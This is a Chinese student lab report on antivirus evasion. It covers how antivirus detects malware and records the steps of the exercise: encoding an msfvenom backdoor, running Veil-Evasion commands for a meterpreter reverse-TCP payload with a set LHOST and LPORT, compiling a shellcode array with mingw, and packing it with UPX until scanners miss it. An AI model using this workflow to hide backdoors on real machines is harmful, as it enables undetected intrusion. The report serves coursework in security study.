20155331 Exp3 免杀原理与实践

Posted 20155331

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20155331 Exp3 免杀原理与实践相关的知识,希望对你有一定的参考价值。

20155331 Exp3 免杀原理与实践

基础问题回答

杀软是如何检测出恶意代码的?

1.基于特征码的检测,2.启发式恶意软件检测,3.基于行为的恶意软件检测。

免杀是做什么?

让病毒不被杀毒软件杀掉。

免杀的基本方法有哪些?

1.改变特征码 2.加壳

实践总结与体会

这次实验让我深入理解了免杀原理,也让我知道了原来以前认为很安全的杀毒软件业并没有那么可靠,因为有很多方法可以实现免杀,给我们的电脑带来风险。

离实战还缺些什么技术或步骤?

实战中不可能那么容易在别人的电脑中植入一个后门程序。

实验的局限性很大。

实践过程记录

一.免杀效果参考基准

把上一次实验用msfvenom生成的后门放入http://www.virscan.org/进行检测

二.使用MSF编码器

对后门程序进行一次重新编码,再次进行检测

我们再将后门程序进行编码十次,然后再检测

可见,编码对免杀没啥用。

三.使用veil-evasion生成

启动evail-evasion,设置好回连的IP地址和端口号后,生成后门文件。
命令行中输入veil,
后在veil中输入命令use evasion

依次输入如下命令:

use c/meterpreter/rev_tcp.py

set LHOST 192.168.81.128
set LPORT 5331

generate
可执行文件的文件名(palyload5331)

通过命令找到文件

扫描结果

四.利用shellcode编写后门

首先,在Kali上使用命令生成一个c语言格式的Shellcode数组

创建一个文件5331dzdd.c,然后将unsigned char buf[]赋值到其中,

使用命令:i686-w64-mingw32-g++ 20155312.c -o 20155312.exe编译这个.c文件为可执行文件:

在扫描软件上看看

使用UPX对生成的后门程序加壳:

再扫描

杀毒软件没杀出来这个后门,实验成功,实现了免杀

回连

在kali下进入MSF打开监听进程,实现方法参考上期实验博客
尝试运行,后门程序成功获取权限

实验中遇到的问题

解决方案:把虚拟机里的.lck的文件夹给删了,然后再把任务管理器里面的所有VM关了再重启,不过每次重新开机时还是会有这个问题。

以上是关于20155331 Exp3 免杀原理与实践的主要内容,如果未能解决你的问题,请参考以下文章

20164301 Exp3 免杀原理与实践

20155302《网络对抗》Exp3 免杀原理与实践

20155320 Exp3 免杀原理与实践

EXP3 免杀原理与实践 20155113徐步桥

20165218 《网络对抗技术》Exp3 免杀原理与实践

Exp3 免杀原理与实践 20164321 王君陶